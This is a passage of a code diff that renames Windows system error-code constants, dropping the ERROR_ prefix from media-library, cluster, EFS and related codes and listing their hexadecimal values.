= 0x10CE - ERROR_DRIVE_MEDIA_MISMATCH = 0x10CF - ERROR_MEDIA_OFFLINE = 0x10D0 - ERROR_LIBRARY_OFFLINE = 0x10D1 - ERROR_EMPTY = 0x10D2 - ERROR_NOT_EMPTY = 0x10D3 - ERROR_MEDIA_UNAVAILABLE = 0x10D4 - ERROR_RESOURCE_DISABLED = 0x10D5 - ERROR_INVALID_CLEANER = 0x10D6 - ERROR_UNABLE_TO_CLEAN = 0x10D7 - ERROR_OBJECT_NOT_FOUND = 0x10D8 - ERROR_DATABASE_FAILURE = 0x10D9 - ERROR_DATABASE_FULL = 0x10DA - ERROR_MEDIA_INCOMPATIBLE = 0x10DB - ERROR_RESOURCE_NOT_PRESENT = 0x10DC - ERROR_INVALID_OPERATION = 0x10DD - ERROR_MEDIA_NOT_AVAILABLE = 0x10DE - ERROR_DEVICE_NOT_AVAILABLE = 0x10DF - ERROR_REQUEST_REFUSED = 0x10E0 - ERROR_INVALID_DRIVE_OBJECT = 0x10E1 - ERROR_LIBRARY_FULL = 0x10E2 - ERROR_MEDIUM_NOT_ACCESSIBLE = 0x10E3 - ERROR_UNABLE_TO_LOAD_MEDIUM = 0x10E4 - ERROR_UNABLE_TO_INVENTORY_DRIVE = 0x10E5 - ERROR_UNABLE_TO_INVENTORY_SLOT = 0x10E6 - ERROR_UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 - ERROR_TRANSPORT_FULL = 0x10E8 - ERROR_CONTROLLING_IEPORT = 0x10E9 - ERROR_UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA - ERROR_CLEANER_SLOT_SET = 0x10EB - ERROR_CLEANER_SLOT_NOT_SET = 0x10EC - ERROR_CLEANER_CARTRIDGE_SPENT = 0x10ED - ERROR_UNEXPECTED_OMID = 0x10EE - ERROR_CANT_DELETE_LAST_ITEM = 0x10EF - ERROR_MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 - ERROR_VOLUME_CONTAINS_SYS_FILES = 0x10F1 - ERROR_INDIGENOUS_TYPE = 0x10F2 - ERROR_NO_SUPPORTING_DRIVES = 0x10F3 - ERROR_CLEANER_CARTRIDGE_INSTALLED = 0x10F4 - ERROR_IEPORT_FULL = 0x10F5 - ERROR_FILE_OFFLINE = 0x10FE - ERROR_REMOTE_STORAGE_NOT_ACTIVE = 0x10FF - ERROR_REMOTE_STORAGE_MEDIA_ERROR = 0x1100 - ERROR_NOT_A_REPARSE_POINT = 0x1126 - ERROR_REPARSE_ATTRIBUTE_CONFLICT = 0x1127 - ERROR_INVALID_REPARSE_DATA = 0x1128 - ERROR_REPARSE_TAG_INVALID = 0x1129 - ERROR_REPARSE_TAG_MISMATCH = 0x112A - ERROR_VOLUME_NOT_SIS_ENABLED = 0x1194 - ERROR_DEPENDENT_RESOURCE_EXISTS = 0x1389 - ERROR_DEPENDENCY_NOT_FOUND = 0x138A - ERROR_DEPENDENCY_ALREADY_EXISTS = 0x138B - ERROR_RESOURCE_NOT_ONLINE = 0x138C - ERROR_HOST_NODE_NOT_AVAILABLE = 0x138D - ERROR_RESOURCE_NOT_AVAILABLE = 0x138E - ERROR_RESOURCE_NOT_FOUND = 0x138F - ERROR_SHUTDOWN_CLUSTER = 0x1390 - ERROR_CANT_EVICT_ACTIVE_NODE = 0x1391 - ERROR_OBJECT_ALREADY_EXISTS = 0x1392 - ERROR_OBJECT_IN_LIST = 0x1393 - ERROR_GROUP_NOT_AVAILABLE = 0x1394 - ERROR_GROUP_NOT_FOUND = 0x1395 - ERROR_GROUP_NOT_ONLINE = 0x1396 - ERROR_HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 - ERROR_HOST_NODE_NOT_GROUP_OWNER = 0x1398 - ERROR_RESMON_CREATE_FAILED = 0x1399 - ERROR_RESMON_ONLINE_FAILED = 0x139A - ERROR_RESOURCE_ONLINE = 0x139B - ERROR_QUORUM_RESOURCE = 0x139C - ERROR_NOT_QUORUM_CAPABLE = 0x139D - ERROR_CLUSTER_SHUTTING_DOWN = 0x139E - ERROR_INVALID_STATE = 0x139F - ERROR_RESOURCE_PROPERTIES_STORED = 0x13A0 - ERROR_NOT_QUORUM_CLASS = 0x13A1 - ERROR_CORE_RESOURCE = 0x13A2 - ERROR_QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 - ERROR_QUORUMLOG_OPEN_FAILED = 0x13A4 - ERROR_CLUSTERLOG_CORRUPT = 0x13A5 - ERROR_CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 - ERROR_CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 - ERROR_CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 - ERROR_CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 - ERROR_QUORUM_OWNER_ALIVE = 0x13AA - ERROR_NETWORK_NOT_AVAILABLE = 0x13AB - ERROR_NODE_NOT_AVAILABLE = 0x13AC - ERROR_ALL_NODES_NOT_AVAILABLE = 0x13AD - ERROR_RESOURCE_FAILED = 0x13AE - ERROR_CLUSTER_INVALID_NODE = 0x13AF - ERROR_CLUSTER_NODE_EXISTS = 0x13B0 - ERROR_CLUSTER_JOIN_IN_PROGRESS = 0x13B1 - ERROR_CLUSTER_NODE_NOT_FOUND = 0x13B2 - ERROR_CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 - ERROR_CLUSTER_NETWORK_EXISTS = 0x13B4 - ERROR_CLUSTER_NETWORK_NOT_FOUND = 0x13B5 - ERROR_CLUSTER_NETINTERFACE_EXISTS = 0x13B6 - ERROR_CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 - ERROR_CLUSTER_INVALID_REQUEST = 0x13B8 - ERROR_CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 - ERROR_CLUSTER_NODE_DOWN = 0x13BA - ERROR_CLUSTER_NODE_UNREACHABLE = 0x13BB - ERROR_CLUSTER_NODE_NOT_MEMBER = 0x13BC - ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD - ERROR_CLUSTER_INVALID_NETWORK = 0x13BE - ERROR_CLUSTER_NODE_UP = 0x13C0 - ERROR_CLUSTER_IPADDR_IN_USE = 0x13C1 - ERROR_CLUSTER_NODE_NOT_PAUSED = 0x13C2 - ERROR_CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 - ERROR_CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 - ERROR_CLUSTER_NODE_ALREADY_UP = 0x13C5 - ERROR_CLUSTER_NODE_ALREADY_DOWN = 0x13C6 - ERROR_CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 - ERROR_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 - ERROR_CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 - ERROR_CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA - ERROR_CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB - ERROR_INVALID_OPERATION_ON_QUORUM = 0x13CC - ERROR_DEPENDENCY_NOT_ALLOWED = 0x13CD - ERROR_CLUSTER_NODE_PAUSED = 0x13CE - ERROR_NODE_CANT_HOST_RESOURCE = 0x13CF - ERROR_CLUSTER_NODE_NOT_READY = 0x13D0 - ERROR_CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 - ERROR_CLUSTER_JOIN_ABORTED = 0x13D2 - ERROR_CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 - ERROR_CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 - ERROR_CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 - ERROR_CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 - ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 - ERROR_CLUSTER_RESNAME_NOT_FOUND = 0x13D8 - ERROR_CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 - ERROR_CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA - ERROR_CLUSTER_DATABASE_SEQMISMATCH = 0x13DB - ERROR_RESMON_INVALID_STATE = 0x13DC - ERROR_CLUSTER_GUM_NOT_LOCKER = 0x13DD - ERROR_QUORUM_DISK_NOT_FOUND = 0x13DE - ERROR_DATABASE_BACKUP_CORRUPT = 0x13DF - ERROR_CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 - ERROR_RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 - ERROR_CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 - ERROR_CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 - ERROR_CLUSTER_MEMBERSHIP_HALT = 0x1704 - ERROR_CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 - ERROR_CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 - ERROR_CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 - ERROR_CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 - ERROR_CLUSTER_PARAMETER_MISMATCH = 0x1709 - ERROR_NODE_CANNOT_BE_CLUSTERED = 0x170A - ERROR_CLUSTER_WRONG_OS_VERSION = 0x170B - ERROR_CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C - ERROR_CLUSCFG_ALREADY_COMMITTED = 0x170D - ERROR_CLUSCFG_ROLLBACK_FAILED = 0x170E - ERROR_CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F - ERROR_CLUSTER_OLD_VERSION = 0x1710 - ERROR_CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 - ERROR_CLUSTER_NO_NET_ADAPTERS = 0x1712 - ERROR_CLUSTER_POISONED = 0x1713 - ERROR_CLUSTER_GROUP_MOVING = 0x1714 - ERROR_CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 - ERROR_RESOURCE_CALL_TIMED_OUT = 0x1716 - ERROR_INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 - ERROR_CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 - ERROR_CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 - ERROR_CLUSTER_PARTIAL_SEND = 0x171A - ERROR_CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B - ERROR_CLUSTER_INVALID_STRING_TERMINATION = 0x171C - ERROR_CLUSTER_INVALID_STRING_FORMAT = 0x171D - ERROR_CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E - ERROR_CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F - ERROR_CLUSTER_NULL_DATA = 0x1720 - ERROR_CLUSTER_PARTIAL_READ = 0x1721 - ERROR_CLUSTER_PARTIAL_WRITE = 0x1722 - ERROR_CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 - ERROR_DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 - ERROR_CLUSTER_NO_QUORUM = 0x1725 - ERROR_CLUSTER_INVALID_IPV6_NETWORK = 0x1726 - ERROR_CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 - ERROR_QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 - ERROR_DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 - ERROR_EXCEPTION_IN_RESOURCE_CALL = 0x172A - ERROR_CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B - ERROR_CLUSTER_NOT_INSTALLED = 0x172C - ERROR_CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D - ERROR_CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E - ERROR_CLUSTER_TOO_MANY_NODES = 0x172F - ERROR_CLUSTER_OBJECT_ALREADY_USED = 0x1730 - ERROR_NONCORE_GROUPS_FOUND = 0x1731 - ERROR_FILE_SHARE_RESOURCE_CONFLICT = 0x1732 - ERROR_CLUSTER_EVICT_INVALID_REQUEST = 0x1733 - ERROR_CLUSTER_SINGLETON_RESOURCE = 0x1734 - ERROR_CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 - ERROR_CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 - ERROR_CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 - ERROR_CLUSTER_GROUP_BUSY = 0x1738 - ERROR_CLUSTER_NOT_SHARED_VOLUME = 0x1739 - ERROR_CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A - ERROR_CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B - ERROR_CLUSTER_USE_SHARED_VOLUMES_API = 0x173C - ERROR_CLUSTER_BACKUP_IN_PROGRESS = 0x173D - ERROR_NON_CSV_PATH = 0x173E - ERROR_CSV_VOLUME_NOT_LOCAL = 0x173F - ERROR_CLUSTER_WATCHDOG_TERMINATING = 0x1740 - ERROR_ENCRYPTION_FAILED = 0x1770 - ERROR_DECRYPTION_FAILED = 0x1771 - ERROR_FILE_ENCRYPTED = 0x1772 - ERROR_NO_RECOVERY_POLICY = 0x1773 - ERROR_NO_EFS = 0x1774 - ERROR_WRONG_EFS = 0x1775 - ERROR_NO_USER_KEYS = 0x1776 - ERROR_FILE_NOT_ENCRYPTED = 0x1777 - ERROR_NOT_EXPORT_FORMAT = 0x1778 - ERROR_FILE_READ_ONLY = 0x1779 - ERROR_DIR_EFS_DISALLOWED = 0x177A - ERROR_EFS_SERVER_NOT_TRUSTED = 0x177B - ERROR_BAD_RECOVERY_POLICY = 0x177C - ERROR_EFS_ALG_BLOB_TOO_BIG = 0x177D - ERROR_VOLUME_NOT_SUPPORT_EFS = 0x177E - ERROR_EFS_DISABLED = 0x177F - ERROR_EFS_VERSION_NOT_SUPPORT = 0x1780 - ERROR_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 - ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 - ERROR_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 - ERROR_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 - ERROR_CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 - ERROR_NO_BROWSER_SERVERS_FOUND = 0x17E6 + KM_DRIVER_BLOCKED = 0x078A + CONTEXT_EXPIRED = 0x078B + PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C + ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D + USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E + AUTHENTICATION_FIREWALL_FAILED = 0x078F + REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 + NTLM_BLOCKED = 0x0791 + INVALID_PIXEL_FORMAT = 0x07D0 + BAD_DRIVER = 0x07D1 + INVALID_WINDOW_STYLE = 0x07D2 + METAFILE_NOT_SUPPORTED = 0x07D3 + TRANSFORM_NOT_SUPPORTED = 0x07D4 + CLIPPING_NOT_SUPPORTED = 0x07D5 + INVALID_CMM = 0x07DA + INVALID_PROFILE = 0x07DB + TAG_NOT_FOUND = 0x07DC + TAG_NOT_PRESENT = 0x07DD + DUPLICATE_TAG = 0x07DE + PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF + PROFILE_NOT_FOUND = 0x07E0 + INVALID_COLORSPACE = 0x07E1 + ICM_NOT_ENABLED = 0x07E2 + DELETING_ICM_XFORM = 0x07E3 + INVALID_TRANSFORM = 0x07E4 + COLORSPACE_MISMATCH = 0x07E5 + INVALID_COLORINDEX = 0x07E6 + PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 + CONNECTED_OTHER_PASSWORD = 0x083C + CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D + BAD_USERNAME = 0x089A + NOT_CONNECTED = 0x08CA + OPEN_FILES = 0x0961 + ACTIVE_CONNECTIONS = 0x0962 + DEVICE_IN_USE = 0x0964 + UNKNOWN_PRINT_MONITOR = 0x0BB8 + PRINTER_DRIVER_IN_USE = 0x0BB9 + SPOOL_FILE_NOT_FOUND = 0x0BBA + SPL_NO_STARTDOC = 0x0BBB + SPL_NO_ADDJOB = 0x0BBC + PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD + PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE + INVALID_PRINT_MONITOR = 0x0BBF + PRINT_MONITOR_IN_USE = 0x0BC0 + PRINTER_HAS_JOBS_QUEUED = 0x0BC1 + SUCCESS_REBOOT_REQUIRED = 0x0BC2 + SUCCESS_RESTART_REQUIRED = 0x0BC3 + PRINTER_NOT_FOUND = 0x0BC4 + PRINTER_DRIVER_WARNED = 0x0BC5 + PRINTER_DRIVER_BLOCKED = 0x0BC6 + PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 + CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 + FAIL_REBOOT_REQUIRED = 0x0BC9 + FAIL_REBOOT_INITIATED = 0x0BCA + PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB + PRINT_JOB_RESTART_REQUIRED = 0x0BCC + IO_REISSUE_AS_CACHED = 0x0F6E + WINS_INTERNAL = 0x0FA0 + CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 + STATIC_INIT = 0x0FA2 + INC_BACKUP = 0x0FA3 + FULL_BACKUP = 0x0FA4 + REC_NON_EXISTENT = 0x0FA5 + RPL_NOT_ALLOWED = 0x0FA6 + PEERDIST_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 + PEERDIST_CANNOT_PARSE_CONTENTINFO = 0x0FD3 + PEERDIST_MISSING_DATA = 0x0FD4 + PEERDIST_NO_MORE = 0x0FD5 + PEERDIST_NOT_INITIALIZED = 0x0FD6 + PEERDIST_ALREADY_INITIALIZED = 0x0FD7 + PEERDIST_SHUTDOWN_IN_PROGRESS = 0x0FD8 + PEERDIST_INVALIDATED = 0x0FD9 + PEERDIST_ALREADY_EXISTS = 0x0FDA + PEERDIST_OPERATION_NOTFOUND = 0x0FDB + PEERDIST_ALREADY_COMPLETED = 0x0FDC + PEERDIST_OUT_OF_BOUNDS = 0x0FDD + PEERDIST_VERSION_UNSUPPORTED = 0x0FDE + PEERDIST_INVALID_CONFIGURATION = 0x0FDF + PEERDIST_NOT_LICENSED = 0x0FE0 + PEERDIST_SERVICE_UNAVAILABLE = 0x0FE1 + DHCP_ADDRESS_CONFLICT = 0x1004 + WMI_GUID_NOT_FOUND = 0x1068 + WMI_INSTANCE_NOT_FOUND = 0x1069 + WMI_ITEMID_NOT_FOUND = 0x106A + WMI_TRY_AGAIN = 0x106B + WMI_DP_NOT_FOUND = 0x106C + WMI_UNRESOLVED_INSTANCE_REF = 0x106D + WMI_ALREADY_ENABLED = 0x106E + WMI_GUID_DISCONNECTED = 0x106F + WMI_SERVER_UNAVAILABLE = 0x1070 + WMI_DP_FAILED = 0x1071 + WMI_INVALID_MOF = 0x1072 + WMI_INVALID_REGINFO = 0x1073 + WMI_ALREADY_DISABLED = 0x1074 + WMI_READ_ONLY = 0x1075 + WMI_SET_FAILURE = 0x1076 + INVALID_MEDIA = 0x10CC + INVALID_LIBRARY = 0x10CD + INVALID_MEDIA_POOL = 0x10CE + DRIVE_MEDIA_MISMATCH = 0x10CF + MEDIA_OFFLINE = 0x10D0 + LIBRARY_OFFLINE = 0x10D1 + EMPTY = 0x10D2 + NOT_EMPTY = 0x10D3 + MEDIA_UNAVAILABLE = 0x10D4 + RESOURCE_DISABLED = 0x10D5 + INVALID_CLEANER = 0x10D6 + UNABLE_TO_CLEAN = 0x10D7 + OBJECT_NOT_FOUND = 0x10D8 + DATABASE_FAILURE = 0x10D9 + DATABASE_FULL = 0x10DA + MEDIA_INCOMPATIBLE = 0x10DB + RESOURCE_NOT_PRESENT = 0x10DC + INVALID_OPERATION = 0x10DD + MEDIA_NOT_AVAILABLE = 0x10DE + DEVICE_NOT_AVAILABLE = 0x10DF + REQUEST_REFUSED = 0x10E0 + INVALID_DRIVE_OBJECT = 0x10E1 + LIBRARY_FULL = 0x10E2 + MEDIUM_NOT_ACCESSIBLE = 0x10E3 + UNABLE_TO_LOAD_MEDIUM = 0x10E4 + UNABLE_TO_INVENTORY_DRIVE = 0x10E5 + UNABLE_TO_INVENTORY_SLOT = 0x10E6 + UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 + TRANSPORT_FULL = 0x10E8 + CONTROLLING_IEPORT = 0x10E9 + UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA + CLEANER_SLOT_SET = 0x10EB + CLEANER_SLOT_NOT_SET = 0x10EC + CLEANER_CARTRIDGE_SPENT = 0x10ED + UNEXPECTED_OMID = 0x10EE + CANT_DELETE_LAST_ITEM = 0x10EF + MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 + VOLUME_CONTAINS_SYS_FILES = 0x10F1 + INDIGENOUS_TYPE = 0x10F2 + NO_SUPPORTING_DRIVES = 0x10F3 + CLEANER_CARTRIDGE_INSTALLED = 0x10F4 + IEPORT_FULL = 0x10F5 + FILE_OFFLINE = 0x10FE + REMOTE_STORAGE_NOT_ACTIVE = 0x10FF + REMOTE_STORAGE_MEDIA_ERROR = 0x1100 + NOT_A_REPARSE_POINT = 0x1126 + REPARSE_ATTRIBUTE_CONFLICT = 0x1127 + INVALID_REPARSE_DATA = 0x1128 + REPARSE_TAG_INVALID = 0x1129 + REPARSE_TAG_MISMATCH = 0x112A + VOLUME_NOT_SIS_ENABLED = 0x1194 + DEPENDENT_RESOURCE_EXISTS = 0x1389 + DEPENDENCY_NOT_FOUND = 0x138A + DEPENDENCY_ALREADY_EXISTS = 0x138B + RESOURCE_NOT_ONLINE = 0x138C + HOST_NODE_NOT_AVAILABLE = 0x138D + RESOURCE_NOT_AVAILABLE = 0x138E + RESOURCE_NOT_FOUND = 0x138F + SHUTDOWN_CLUSTER = 0x1390 + CANT_EVICT_ACTIVE_NODE = 0x1391 + OBJECT_ALREADY_EXISTS = 0x1392 + OBJECT_IN_LIST = 0x1393 + GROUP_NOT_AVAILABLE = 0x1394 + GROUP_NOT_FOUND = 0x1395 + GROUP_NOT_ONLINE = 0x1396 + HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 + HOST_NODE_NOT_GROUP_OWNER = 0x1398 + RESMON_CREATE_FAILED = 0x1399 + RESMON_ONLINE_FAILED = 0x139A + RESOURCE_ONLINE = 0x139B + QUORUM_RESOURCE = 0x139C + NOT_QUORUM_CAPABLE = 0x139D + CLUSTER_SHUTTING_DOWN = 0x139E + INVALID_STATE = 0x139F + RESOURCE_PROPERTIES_STORED = 0x13A0 + NOT_QUORUM_CLASS = 0x13A1 + CORE_RESOURCE = 0x13A2 + QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 + QUORUMLOG_OPEN_FAILED = 0x13A4 + CLUSTERLOG_CORRUPT = 0x13A5 + CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 + CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 + CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 + CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 + QUORUM_OWNER_ALIVE = 0x13AA + NETWORK_NOT_AVAILABLE = 0x13AB + NODE_NOT_AVAILABLE = 0x13AC + ALL_NODES_NOT_AVAILABLE = 0x13AD + RESOURCE_FAILED = 0x13AE + CLUSTER_INVALID_NODE = 0x13AF + CLUSTER_NODE_EXISTS = 0x13B0 + CLUSTER_JOIN_IN_PROGRESS = 0x13B1 + CLUSTER_NODE_NOT_FOUND = 0x13B2 + CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 + CLUSTER_NETWORK_EXISTS = 0x13B4 + CLUSTER_NETWORK_NOT_FOUND = 0x13B5 + CLUSTER_NETINTERFACE_EXISTS = 0x13B6 + CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 + CLUSTER_INVALID_REQUEST = 0x13B8 + CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 + CLUSTER_NODE_DOWN = 0x13BA + CLUSTER_NODE_UNREACHABLE = 0x13BB + CLUSTER_NODE_NOT_MEMBER = 0x13BC + CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD + CLUSTER_INVALID_NETWORK = 0x13BE + CLUSTER_NODE_UP = 0x13C0 + CLUSTER_IPADDR_IN_USE = 0x13C1 + CLUSTER_NODE_NOT_PAUSED = 0x13C2 + CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 + CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 + CLUSTER_NODE_ALREADY_UP = 0x13C5 + CLUSTER_NODE_ALREADY_DOWN = 0x13C6 + CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 + CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 + CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 + CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA + CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB + INVALID_OPERATION_ON_QUORUM = 0x13CC + DEPENDENCY_NOT_ALLOWED = 0x13CD + CLUSTER_NODE_PAUSED = 0x13CE + NODE_CANT_HOST_RESOURCE = 0x13CF + CLUSTER_NODE_NOT_READY = 0x13D0 + CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 + CLUSTER_JOIN_ABORTED = 0x13D2 + CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 + CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 + CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 + CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 + CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 + CLUSTER_RESNAME_NOT_FOUND = 0x13D8 + CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 + CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA + CLUSTER_DATABASE_SEQMISMATCH = 0x13DB + RESMON_INVALID_STATE = 0x13DC + CLUSTER_GUM_NOT_LOCKER = 0x13DD + QUORUM_DISK_NOT_FOUND = 0x13DE + DATABASE_BACKUP_CORRUPT = 0x13DF + CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 + RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 + CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 + CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 + CLUSTER_MEMBERSHIP_HALT = 0x1704 + CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 + CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 + CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 + CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 + CLUSTER_PARAMETER_MISMATCH = 0x1709 + NODE_CANNOT_BE_CLUSTERED = 0x170A + CLUSTER_WRONG_OS_VERSION = 0x170B + CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C + CLUSCFG_ALREADY_COMMITTED = 0x170D + CLUSCFG_ROLLBACK_FAILED = 0x170E + CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F + CLUSTER_OLD_VERSION = 0x1710 + CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 + CLUSTER_NO_NET_ADAPTERS = 0x1712 + CLUSTER_POISONED = 0x1713 + CLUSTER_GROUP_MOVING = 0x1714 + CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 + RESOURCE_CALL_TIMED_OUT = 0x1716 + INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 + CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 + CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 + CLUSTER_PARTIAL_SEND = 0x171A + CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B + CLUSTER_INVALID_STRING_TERMINATION = 0x171C + CLUSTER_INVALID_STRING_FORMAT = 0x171D + CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E + CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F + CLUSTER_NULL_DATA = 0x1720 + CLUSTER_PARTIAL_READ = 0x1721 + CLUSTER_PARTIAL_WRITE = 0x1722 + CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 + DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 + CLUSTER_NO_QUORUM = 0x1725 + CLUSTER_INVALID_IPV6_NETWORK = 0x1726 + CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 + QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 + DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 + EXCEPTION_IN_RESOURCE_CALL = 0x172A + CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B + CLUSTER_NOT_INSTALLED = 0x172C + CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D + CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E + CLUSTER_TOO_MANY_NODES = 0x172F + CLUSTER_OBJECT_ALREADY_USED = 0x1730 + NONCORE_GROUPS_FOUND = 0x1731 + FILE_SHARE_RESOURCE_CONFLICT = 0x1732 + CLUSTER_EVICT_INVALID_REQUEST = 0x1733 + CLUSTER_SINGLETON_RESOURCE = 0x1734 + CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 + CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 + CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 + CLUSTER_GROUP_BUSY = 0x1738 + CLUSTER_NOT_SHARED_VOLUME = 0x1739 + CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A + 